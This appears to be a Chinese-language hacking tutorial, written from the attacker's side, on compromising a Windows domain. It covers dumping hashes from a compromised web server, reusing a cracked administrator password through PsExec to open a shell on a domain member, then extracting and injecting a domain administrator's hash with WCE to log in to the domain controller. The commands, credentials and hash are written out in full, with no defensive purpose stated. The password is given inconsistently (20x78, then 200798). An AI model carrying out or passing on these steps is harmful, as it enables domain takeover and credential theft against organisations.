(1)攻擊者第一步首先需要從受害者機器獲取hash pwdump gsecdump等
普通機器:(192.168.0.102)通常是我們獲得的某臺肉雞,通常爲普通的webserver,不處於域中
獲取方式: social engineering, password stealer, password cracker, malicious code,exploiting zero-day
域成員:(192.168.0.109)大的公司,獲取webserver後,通常需要面對一個域內網, 通常上邊有域管理員進行登錄,或者是域管理員委派的用戶。
DC:(192.168.0.7域控制器。
我們通過提權會得到“普通機器”的管理員權限,這時候我們通過HASH提取工具提取出HASH並可以到論壇提供的在線破解網址很容易破解,假如我得到了Administrator的密碼20x78,這時候通常會以這個administrator密碼social engineering域成員的那臺機器。
我通過psexec在192.168.0.102操作,上傳工具wce到192.168.0.109
在192.168.0.102上執行
PsExec.exe \\192.168.0.109 -u administrator -p 200798 -e c:\windows\system32\cmd.exe |
經測試,不能執行net time /domain,說明爲普通的域成員服務器
接下來,我們提取全部的HASH,並觀察域管理的hash,進行注入,首先執行:
C:\>wce -l |
提取全部HASH,紅線部分爲域管理員的HASH。
Wce -s Administrator:BLACKEAGLE:01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F
複製代碼
提示注入成功,我們現在是域管理員權限了,這樣就可以登錄DC了。